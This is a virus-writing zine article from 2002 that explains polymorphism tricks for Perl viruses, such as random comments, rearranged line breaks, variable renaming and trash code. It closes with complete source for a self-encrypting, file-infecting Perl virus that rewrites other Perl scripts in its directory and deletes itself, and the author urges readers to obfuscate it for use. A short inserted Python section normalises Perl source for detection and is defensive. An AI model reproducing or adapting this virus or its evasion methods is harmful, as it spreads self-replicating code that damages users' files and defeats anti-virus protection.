
Polymorphism in Perl Viruses

SnakeByte
29a [6]
March 2002

www.kryptocrew.de/snakebyte/

After writing something about EPO and encryption in Perl viruses I somehow felt that I also had to do this. So I will explain here some techniques which could be used in Perl to create polymorphic Perl viruses.

There are several things we could do to make every infection of the virus different from all the others, to confuse a possible anti-virus scanner. The first one is to add random comments to each line:

 for ($a = 0; $a < @Virus; $a++){
  $comment = int(rand(65535));
  @Virus[$a] .= " \#$comment" ;
 }
 

You could also include characters or other stuff, but once there is a scanner for Perl viruses, the first thing it will do is remove all comments =)

So this is very weak, but until there is a scanner we could use it. Another thing we could do to make every virus different is to change the line breaks. In Perl, line breaks are only there for readability, so we could remove every line break and insert new ones (nearly) everywhere we want to.

 printf("testme");
 printf("cool");

 could also be:

 printf(
 "testme"); printf("cool"
 );
 

So here we could get a nice range of variability =)

But once scanners are implemented, they will just remove all line breaks and unnecessary spaces, so this would not help in the long run.

Ok, let's start with something that might also work in the long run: replacing all variable names with other ones.

 $myvars2 = "MyVars:Virus:whatever:myvars2";          # all the variables you use
 @MyVars = split(":", $myvars2);                      # read them into an array
 for ( $x = 0; $x < @MyVars; $x++ ){
  $newVar = chr(int(rand(25)+65));                    # we take all letters
  $newVar .= int(rand(65535));                        # + a random number
  $Virus =~ [email protected][$x]/$newVar/;                   # and replace the variable =P
 }
 

Easy and effective: this makes string scanning useless and forces the AVs to use wildcards =) This is better poly than the techniques described above, but we can go even further. We could swap instructions when generating the decryptor and use other ones that do the same thing (I don't think you need code for this *g*).
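The author expects a scanner to simply strip comments and surplus line breaks, and the same idea extends to the variable renaming: rename everything canonically before matching. The following is an added example from the detection side, not code from the article: a small Python normaliser for Perl source that drops comments and layout, alpha-renames sigiled variables in order of first appearance, and hashes the result so that the decorated variants collapse to one fingerprint. The two sample snippets are constructed from the article's examples.

```python
import hashlib
import re

# Minimal Perl lexer. Strings come first so a '#' inside quotes is never
# taken for a comment; sigiled variables are kept apart from bare words so
# they can be renamed canonically while builtins like printf stay as-is.
TOKEN = re.compile(r'''
    (?P<str>"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*')
  | (?P<var>[$@%]\w+)
  | (?P<word>\w+)
  | (?P<ws>\s+)
  | (?P<comment>\#[^\n]*)
  | (?P<other>.)
''', re.VERBOSE | re.DOTALL)

def normalize(src):
    """Strip comments and layout, rename variables to $v0, $v1, ... in order
    of first appearance (the sigil is kept, so @x and $x share one name)."""
    names = {}
    out = []
    for m in TOKEN.finditer(src):
        kind, text = m.lastgroup, m.group()
        if kind in ("ws", "comment"):
            continue
        if kind == "var":
            idx = names.setdefault(text[1:], len(names))
            text = f"{text[0]}v{idx}"
        # keep a single space only where two word-like tokens would fuse
        if out and re.match(r"\w", out[-1][-1]) and re.match(r"[\w$@%]", text[0]):
            out.append(" ")
        out.append(text)
    return "".join(out)

def fingerprint(src):
    """Hash of the normalized form; identical for all decorated variants."""
    return hashlib.sha256(normalize(src).encode("utf-8")).hexdigest()

# Constructed samples: the same two statements, decorated the three ways the
# article describes (numeric comments, moved line breaks, renamed variables).
VARIANT_A = '$Virus = join("", @Virus); #40213\nprintf("testme"); #7\nprintf("cool"); #65001\n'
VARIANT_B = '$Q9811 =\njoin("",\n@Q9811); printf(\n"testme"); printf("cool"\n);\n'

if __name__ == "__main__":
    print(normalize(VARIANT_A))
    print(fingerprint(VARIANT_A) == fingerprint(VARIANT_B))
```

Instruction swapping and trash code, which the article goes on to describe, survive this normalisation; those need wildcard or behavioural matching rather than a canonical hash.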

When swapping and replacing instructions, you are also able to insert trash code, like $DD34424 = "sdfk.lsdjfpi3";, to make the virus even more variable. Such a trash code generator should be written as a sub, so that you can use simple expressions like

 $myCode .= "whatever" . &trashcode;       # string concatenation, not numeric +
 

This way you can keep the code short and effective.

In my mind, when you combine EPO and polymorphism in Perl viruses, AVs will have a very hard time detecting and removing them... ;)

Ok, this is a polymorphic Perl virus which uses EPO techniques. To make this code useful, strip the comments, remove line breaks, and obfuscate it .. ;)

 # 1st Poly Virus by SnakeByte [Matrix/KryptoCrew]  
 open(File,$0);@Virus=<File>;close(File);               # read own code
 $Virus=join("", @Virus);foreach $FileName(<*>) {       # get files
 if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {      # check file
 open(File, "$FileName");@Temp=<File>;close(File);      # open file
 if ((@Temp[0] =~ /perl/i ) && ( substr(@Temp[0],0,2) eq "\#!" )) {     # perl file ?
  if (( length(@Temp[0]) % 5 ) != 0 ){                  # already infected ?
                                                        # first we generate a decryptor

 $Key = int(rand(255));                                 # cryptkey
 $crypttype = int(rand(2));                             # how to crypt it ?

 for ( $X = 0; $X < length($Virus); $X++ ){             # Encrypt it
  if ( $crypttype == 0 ){
   @Crypt[$X] = (ord(substr($Virus, $X, 1))) * ($Key);  # Multiply
  } else {
   @Crypt[$X] = (ord(substr($Virus, $X, 1))) + ($Key);  # Addition
  }
 }

 $connectit = chr(int(rand(25)+65));
 $VirString = join($connectit, @Crypt);                 # all values get seperated by a !
 $filename  =  chr(int(rand(25)+65));                   # random filename to put virus to
 $filename .= int(rand(65535));
     if ( int(rand(2)) == 0 ){
      @Vir[0] = "\$l1l = \"$VirString\"\;";
      @Vir[1] = "\$11l = $Key\;";                       # key to decrypt
     } else {
      @Vir[0] = "\$11l = $Key\;";                       # key to decrypt
      @Vir[1] = "\$l1l = \"$VirString\"\;";
     }
     @Vir[2] = "\@ll1 = split(\"$connectit\", \$l1l)\;";
     @Vir[3] = "for ( \$lll = 0\; \$lll < (\@ll1)\; \$lll++ ) { ";  # Decrypt Loop

     if ( $crypttype == 0 ){
      @Vir[4] = " \$l11 .= chr(\@ll1[\$lll] \/ \$11l)\;";       # Decrypt Char
     } else {
      @Vir[4] = " \$l11 .= chr(\@ll1[\$lll]-\$11l)\;";          # Decrypt Char
     }
     @Vir[5] = "}";
     @Vir[6] = "open(1l1, \">$filename\")\;";           # write encrypted
     @Vir[7] = "print 1l1 \$l11\;";                     # string to a file
     @Vir[8] = "close(1l1)\;";
     @Vir[9] = "\$lll = \`perl $filename\`;\n";         # and start it

                                                        # change variables
                                                        # $Virus File @Virus $X  $Key $Vir
                                                        # l1l    1l1  ll1    lll 11l  l11
    @vars = ("l1l", "1l1", "ll1", "lll", "11l", "l11"); # replace the variables
    foreach $replace (@vars){
     $newVar = chr(int(rand(25)+65));                   # with a letter
     $newVar .= int(rand(65535));                       # and a random number
     for ( $b=0; $b < @Vir; $b++){
      @Vir[$b] =~ s/$replace/$newVar/g ;
     }
    }


    do {
      chomp @Temp[0];
      @Temp[0] .= " \n";
    } until((length(@Temp[0]) % 5) == 0 );


    open(File, ">$FileName");                   # and write the infected
    $Temp = join("\n", @Vir);

 
    for ( $X = ( (@Temp) >> 1 ); $X < @Temp; $X++ ){
      if ( @Temp[$X] =~ "\;\n" ) {              # insert virus in the middle
      $Temp2 = join("", @Temp[0..$X]);          # write first part
      print File $Temp2;                        # and virus
      print File $Temp; $X++;
      $Y = (@Temp);
      $Temp2 = join("", @Temp[$X..$Y]);         # insert rest of the file
      print File $Temp2;
      goto CloseFile;
     }
    }
 
     $Temp2 = join("", @Temp);                  # no possibility to insert virus
     print File $Temp;                          # file back to disk
     print File $Temp2;                         # without EPO


CloseFile:
     close(File);
 }}}}

 $a = `rm $0`;                                  # delete our selves..
 